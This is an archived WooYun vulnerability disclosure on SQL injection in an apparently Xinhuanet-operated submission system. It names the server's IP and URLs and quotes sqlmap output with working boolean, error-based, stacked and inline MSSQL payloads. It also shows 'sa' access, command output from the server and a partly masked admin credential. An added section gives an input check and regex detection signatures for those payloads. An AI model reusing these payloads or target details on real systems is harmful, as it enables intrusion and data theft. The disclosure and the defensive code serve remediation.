WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-03-04: Details sent to the vendor, awaiting vendor handling
2015-03-09: Vendor confirmed; details disclosed to the vendor only
2015-03-19: Details disclosed to core white hats and experts in related fields
2015-03-29: Details disclosed to ordinary white hats
2015-04-08: Details disclosed to intern white hats
2015-04-18: Details disclosed to the public
Xinhuanet online submission system SQL injection (SA privileges); MSSQL inherits SYSTEM privileges, so the server can be taken over directly.

URLs:
http://221.232.141.109/login.asp
http://221.232.141.109/ggDetail.asp?id=2

At the login page you can register as an ordinary user and enter the system. The "id" parameter of the announcement page is not filtered properly, leaving a SQL injection.
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 8865=8865

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=2 AND 2728=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2728=2728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6780=6780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113))
---
[23:48:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[23:48:44] [INFO] fetching current user
[23:48:44] [INFO] heuristics detected web page charset 'GB2312'
[23:48:44] [INFO] retrieved: sa
current user: 'sa'
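An added example, not part of the original report: the strict integer check on the id parameter that the report's fix ("filter it") amounts to, plus a scan over constructed IIS W3C log lines that classifies requests by the payload families sqlmap listed above. The log field layout and the client IP are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (date time cs-method cs-uri-stem cs-uri-query c-ip sc-status);
# not from the report. The id values mirror the payload families sqlmap listed above.
IIS_LOG = """\
2015-03-04 23:48:40 GET /ggDetail.asp id=2 203.0.113.7 200
2015-03-04 23:48:41 GET /ggDetail.asp id=2%20AND%208865%3D8865 203.0.113.7 200
2015-03-04 23:48:42 GET /ggDetail.asp id=2%20AND%202728%3DCONVERT(INT%2C(SELECT%20CHAR(113)%2BCHAR(112))) 203.0.113.7 500
2015-03-04 23:48:44 GET /ggDetail.asp id=2%3B%20WAITFOR%20DELAY%20'0%3A0%3A5'-- 203.0.113.7 200
2015-03-04 23:48:45 GET /ggDetail.asp id=(SELECT%20CHAR(113)%2BCHAR(112)) 203.0.113.7 200
"""

# One pattern per payload family in the sqlmap output; checked in this order.
SIGNATURES = [
    ("stacked/time-based", re.compile(r";\s*WAITFOR\s+DELAY", re.I)),
    ("error-based", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),
    ("inline-query", re.compile(r"^\s*\(\s*SELECT\b", re.I)),
    ("boolean-based", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
]


def is_valid_id(raw: str) -> bool:
    """The filtering the report asks for: an announcement id is a plain positive integer."""
    return re.fullmatch(r"[1-9]\d{0,9}", raw) is not None


def classify_query(cs_uri_query: str) -> Optional[str]:
    """Return the injection family seen in the decoded id value, or None if it is clean."""
    params = dict(p.split("=", 1) for p in cs_uri_query.split("&") if "=" in p)
    id_value = unquote_plus(params.get("id", ""))  # decode after splitting on '&' and '='
    if is_valid_id(id_value):
        return None
    for family, pattern in SIGNATURES:
        if pattern.search(id_value):
            return family
    return "malformed-id"  # not an integer but no known payload: still worth a look


def scan_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (client IP, family) for each ggDetail.asp request whose id is not a clean integer."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[3].lower() != "/ggdetail.asp":
            continue
        family = classify_query(fields[4])
        if family:
            hits.append((fields[5], family))
    return hits
```

Every payload in the sqlmap output fails `is_valid_id`, which is why rejecting anything but an integer closes this hole; the signature scan is only for spotting attempts in existing logs.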
Running cmd:

Windows IP Configuration

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix . :
   IP Address. . . . . . . . . . . . : 192.168.10.251
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.1
Retrieving database columns and the administrator account:

Decrypted:
*****ode**********1990.********************20ed93249cd49**********b2722ca880ef2**********f151e3b83c73fba2*****
Filter it.

Severity: High
Vulnerability Rank: 12
Confirmed: 2015-03-09 12:55
CNVD confirmed and reproduced the vulnerability; it has been forwarded to CNCERT to notify Xinhuanet.
None yet